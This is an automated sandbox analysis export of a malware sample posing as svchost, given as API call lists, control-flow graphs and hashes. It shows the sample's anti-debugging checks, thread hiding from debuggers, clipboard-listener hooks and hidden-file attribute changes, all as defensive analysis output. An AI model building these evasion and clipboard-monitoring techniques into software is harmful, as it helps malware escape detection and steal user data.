                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DebuggerPresent
                                      • String ID: --check$--config$--run
                                      • API String ID: 1347740429-1715824448
                                      • Opcode ID: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction ID: a6e4f3225be8be52f133a3bd3a6e0bcae41296a009743188dca9600d065854ff
                                      • Opcode Fuzzy Hash: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction Fuzzy Hash: D4518871D04218DBDB24CFA6D844BEEBBB4BB08314F14862AE811B73C0D37D9905CBA9

                                      Control-flow Graph

                                      control_flow_graph 124 401100-401128 call 401000 GetModuleHandleA 127 40112a-401149 call 401000 GetProcAddress 124->127 128 40116d 124->128 127->128 132 40114b-401161 GetCurrentProcess NtQueryInformationProcess 127->132 130 40116f-401172 128->130 132->128 133 401163-401167 132->133 133->128 134 401169-40116b 133->134 134->130
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040111B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040113C
                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00401155
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 0040115C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction ID: a6687a9151404b893926094712e7bd645b6c75322a1efd05145472f72e85e0e4
                                      • Opcode Fuzzy Hash: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction Fuzzy Hash: 6101ADB0E40208BBDF10AFF0AC0DBDE7B789B08709F104176E611B62E1D2795A44DB2A

                                      Control-flow Graph

                                      control_flow_graph 135 401090-4010b1 call 401000 GetModuleHandleA 138 4010b3-4010d2 call 401000 GetProcAddress 135->138 139 4010f8-4010fb 135->139 138->139 142 4010d4-4010d8 138->142 143 4010e2-4010e8 GetCurrentThread 142->143 144 4010da-4010e0 142->144 145 4010eb-4010f5 NtSetInformationThread 143->145 144->145 145->139
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                      • GetCurrentThread.KERNEL32 ref: 004010E2
                                      • NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Thread$AddressCurrentHandleInformationModuleProc
                                      • String ID: 7=-55V-55$v={.=q7/8;6*=287|1;.*-
                                      • API String ID: 119525482-1927140540
                                      • Opcode ID: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction ID: 0b82ffc8d0ca1f8d0bdf6dd75ae4657ab6c6ae2d9d09e3d18241b6bc1c87c415
                                      • Opcode Fuzzy Hash: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction Fuzzy Hash: 69016DB4D40308BBDB10AFA0DC4A7DE7B74AB08706F10C07AA945626D1D6785A84DB5A

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00401090: GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                        • Part of subcall function 00401090: GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                        • Part of subcall function 00401090: NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                      • _wcsrchr.LIBCMT ref: 0040DE5E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                      • SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Module$AddressCurrentDirectoryErrorFileHandleInformationModeNameProcThread_wcsrchr
                                      • String ID:
                                      • API String ID: 1734398998-0
                                      • Opcode ID: 80fc6bce9c256495076652354beab7356473027193b4c83409bfd0098307c8fb
                                      • Instruction ID: d51f74107fde24b1b44d4026587f8350a487b3b151098653a9adb7166d01a02a
                                      • Opcode Fuzzy Hash: 80fc6bce9c256495076652354beab7356473027193b4c83409bfd0098307c8fb
                                      • Instruction Fuzzy Hash: FC016770D002089BE750DFB1DD06BED7774AF08705F00407DA745B61D1EE759A55CB69

                                      Control-flow Graph

                                      control_flow_graph 158 40df97-40dfb0 call 40de20 161 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 158->161 162 40dfe2 call 40d7f0 161->162 163 40dfdc-40dfe0 161->163 166 40dfe7 162->166 163->162 165 40dfec-40dff0 163->165 167 40dff6-40e00c call 40f476 165->167 168 40e0ab-40e0af 165->168 166->168 174 40e04e-40e064 call 40f476 167->174 175 40e00e-40e019 167->175 170 40e0b1-40e0b5 LocalFree 168->170 171 40e0bb-40e119 168->171 170->171 182 40e0a6 call 40d7f0 174->182 183 40e066-40e071 174->183 176 40e01b-40e031 call 40f476 175->176 177 40e03c-40e043 175->177 176->177 189 40e033-40e039 176->189 181 40e044 call 405b10 177->181 185 40e049-40e04c 181->185 182->168 186 40e073-40e089 call 40f476 183->186 187 40e094-40e0a4 call 405e10 183->187 185->168 186->187 194 40e08b-40e091 186->194 187->168 189->177 194->187
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction ID: 8b7a6b8f356ce4702e62b5b31cb6d48a6c6ddf238daab223e574e510f6bfc381
                                      • Opcode Fuzzy Hash: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction Fuzzy Hash: 52010471D04219CBDB24DFE5D9087EEBBB4FB08315F20862AD402B22D0C77D591ADB6A

                                      Control-flow Graph

                                      control_flow_graph 195 40dfa6-40dfb0 call 40de20 198 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 195->198 199 40dfe2 call 40d7f0 198->199 200 40dfdc-40dfe0 198->200 203 40dfe7 199->203 200->199 202 40dfec-40dff0 200->202 204 40dff6-40e00c call 40f476 202->204 205 40e0ab-40e0af 202->205 203->205 211 40e04e-40e064 call 40f476 204->211 212 40e00e-40e019 204->212 207 40e0b1-40e0b5 LocalFree 205->207 208 40e0bb-40e119 205->208 207->208 219 40e0a6 call 40d7f0 211->219 220 40e066-40e071 211->220 213 40e01b-40e031 call 40f476 212->213 214 40e03c-40e043 212->214 213->214 226 40e033-40e039 213->226 218 40e044 call 405b10 214->218 222 40e049-40e04c 218->222 219->205 223 40e073-40e089 call 40f476 220->223 224 40e094-40e0a4 call 405e10 220->224 222->205 223->224 231 40e08b-40e091 223->231 224->205 226->214 231->224
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction ID: ae0a6c04ace250e6ec1f5edccdaa0bc9745cba344c46f71d870c8753c6498d62
                                      • Opcode Fuzzy Hash: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction Fuzzy Hash: 2E014471C04218CBDB24DFE5D8087EEBBB4FB08315F10422AD802B3280C77D5919CBAA

                                      Control-flow Graph

                                      control_flow_graph 232 411447-411458 call 41141c ExitProcess
                                      APIs
                                      • ___crtCorExitProcess.LIBCMT ref: 0041144F
                                        • Part of subcall function 0041141C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00411454,00000000,?,00410BC2,000000FF,0000001E,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000), ref: 00411426
                                        • Part of subcall function 0041141C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411436
                                      • ExitProcess.KERNEL32 ref: 00411458
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                      • String ID:
                                      • API String ID: 2427264223-0
                                      • Opcode ID: b4110d07eca1f61fbf2879656b9bbfd95852c39ef410a6f7b787a55806ce86ec
                                      • Instruction ID: 97cd00bbafddeea18524e87ba9999e83b9df1a82b7e94daaf0906db5b7771dd5
                                      • Opcode Fuzzy Hash: b4110d07eca1f61fbf2879656b9bbfd95852c39ef410a6f7b787a55806ce86ec
                                      • Instruction Fuzzy Hash: 6DB09B310001087BCB012F12DC098893F15DB407507148035F50C05031DF71ADD5D589

                                      Control-flow Graph

                                      control_flow_graph 235 41169f-4116ab call 41155f 237 4116b0-4116b4 235->237
                                      APIs
                                      • _doexit.LIBCMT ref: 004116AB
                                        • Part of subcall function 0041155F: __lock.LIBCMT ref: 0041156D
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(0041E0B0,00000020,004116C6,00000000,00000001,00000000,?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115A9
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115BA
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(-00000004,?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115E0
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115F3
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115FD
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DecodePointer$__lock_doexit
                                      • String ID:
                                      • API String ID: 3343572566-0
                                      • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                      • Instruction ID: 69d7dd60be9393ca9a75932822da633d8709a72556d2422c147b43d379804c5d
                                      • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                      • Instruction Fuzzy Hash: 78B0923258020C33DA202646AC03F463A0E87C0B64F250022FA0D1D1A2A9A2A9A1808A

                                      Control-flow Graph

                                      control_flow_graph 385 405b10-405b2c 386 405b35-405b55 385->386 387 405b2e-405b30 385->387 389 405b57-405b59 386->389 390 405b5e-405b7f GetPEB 386->390 388 405e02-405e0f call 40e542 387->388 389->388 392 405b81-405b83 390->392 393 405b88-405bad GetPEB 390->393 392->388 395 405bb6-405bf6 call 4123e0 GetCurrentThread GetThreadContext 393->395 396 405baf-405bb1 393->396 399 405c35-405c4d call 401090 call 40e120 395->399 400 405bf8-405bff 395->400 396->388 410 405c5a-405c61 399->410 411 405c4f-405c57 GetModuleHandleA 399->411 401 405c01-405c08 400->401 402 405c2e-405c30 400->402 401->402 404 405c0a-405c11 401->404 402->388 404->402 406 405c13-405c1a 404->406 406->402 409 405c1c-405c23 406->409 409->402 412 405c25-405c2c 409->412 413 405c67-405c7f GetModuleHandleA 410->413 414 405d28-405d2f 410->414 411->410 412->399 412->402 415 405c81-405c8c LoadLibraryA 413->415 416 405c92-405cc7 GetProcAddress * 2 413->416 417 405d31-405d33 414->417 418 405d38-405d3f 414->418 415->416 419 405cc9-405cd0 416->419 420 405cde-405d13 GetProcAddress * 2 416->420 417->388 421 405d41-405d60 OpenMutexA 418->421 422 405d97-405da8 call 4052a0 418->422 419->420 424 405cd2-405cdc 419->424 420->414 425 405d15-405d1c 420->425 426 405d62-405d71 CloseHandle 421->426 427 405d76-405d91 CreateMutexA 421->427 431 405daa-405dbf call 402b00 422->431 432 405ddc-405de3 422->432 424->414 425->414 430 405d1e 425->430 426->388 427->422 428 405d93-405d95 427->428 428->388 430->414 431->432 437 405dc1-405dd6 call 4058a0 431->437 434 405de5-405df2 CloseHandle 432->434 435 405dfc 432->435 434->435 435->388 437->432
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AddClipboardFormatListener$ChangeClipboardChain$RemoveClipboardFormatListener$SetClipboardViewer$cC0inHj$user32.dll
                                      • API String ID: 0-2614838119
                                      • Opcode ID: 5f3a271f107c04a898097820e861df08812ee36672f426afcdc0ea391e2a129a
                                      • Instruction ID: e4e5dd0de9f09d90ee084e7cb90bd22076d3a6f0aa843fabeb84720459f47b48
                                      • Opcode Fuzzy Hash: 5f3a271f107c04a898097820e861df08812ee36672f426afcdc0ea391e2a129a
                                      • Instruction Fuzzy Hash: BF717D74A442589BEB209F20DC4DBEA7BB4EB14305F4484BBE44A762E1C77C8AC5DF19
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004053DB
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0040540A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardCountFormatTick
                                      • String ID:
                                      • API String ID: 2629628197-0
                                      • Opcode ID: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction ID: e3f2d7c064d7d99d206c5680652346840c7ffd9ef1d315a872dd3332421114f8
                                      • Opcode Fuzzy Hash: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction Fuzzy Hash: 84914A71D00218DFCB14DFAAD848AEFBBB5FF48305F10856AE51AA7290D7389945CF29
                                      APIs
                                      • KillTimer.USER32(?,57AE0D82), ref: 00405839
                                      • PostQuitMessage.USER32(00000000), ref: 00405863
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0040587D
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: KillMessagePostProcQuitTimerWindow
                                      • String ID:
                                      • API String ID: 2965130154-0
                                      • Opcode ID: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction ID: 28f21435e46fd2e830124e72743dc58a12090b41100468ac95c48544234bd2ff
                                      • Opcode Fuzzy Hash: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction Fuzzy Hash: 58518435A00548DFDB24EF60DC48B9B77B4FB04354F4486BAE80AA62D0C7789A95CF59
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000000,C3108867,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D507
                                      • CoCreateInstance.OLE32(0041A230,00000000,00000001,0041A220,?,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D535
                                      • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D593
                                      • _wcsrchr.LIBCMT ref: 0040D5BF
                                      • SetFileAttributesW.KERNEL32(00000000,00000007,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D63F
                                      • CoUninitialize.OLE32(?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D653
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$CreateInitializeInstanceUninitialize_wcsrchr
                                      • String ID:
                                      • API String ID: 1064171213-0
                                      • Opcode ID: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction ID: 4845e592d9404c25205a35a8fd2c5cc2ee3bc669e6c60dc710010856fdd0759c
                                      • Opcode Fuzzy Hash: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction Fuzzy Hash: 41614771A00208AFDB14DF98CC84BEEB7B5BB4C314F148169E509A72A0C778A985CF68
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0040F928
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F93D
                                      • UnhandledExceptionFilter.KERNEL32(0041A294), ref: 0040F948
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040F964
                                      • TerminateProcess.KERNEL32(00000000), ref: 0040F96B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction ID: 88087e6288b79e792aea48af548dc1751c073badf06254871cafe7bc60af0824
                                      • Opcode Fuzzy Hash: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction Fuzzy Hash: C221D6B4A02308DFD720EF65F8496957BE0FB48304F90903AE50993663D7B45596CF9D
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f14a71db8132894cd86a835e0583c0bbe7e498396e1ae2ba2f5ffac09785f036
                                      • Instruction ID: 3d488141a1d6dfcad3178e7f4c6d8b2fbfca122575c8060525bc71110aaa322c
                                      • Opcode Fuzzy Hash: f14a71db8132894cd86a835e0583c0bbe7e498396e1ae2ba2f5ffac09785f036
                                      • Instruction Fuzzy Hash: 5C317230A155598AEB319B10C808BABBBB4EB44314F0440FBE449B62C1C67C9FC8CF5E
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?), ref: 004014A8
                                      • CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 004014AF
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CheckCurrentDebuggerPresentProcessRemote
                                      • String ID:
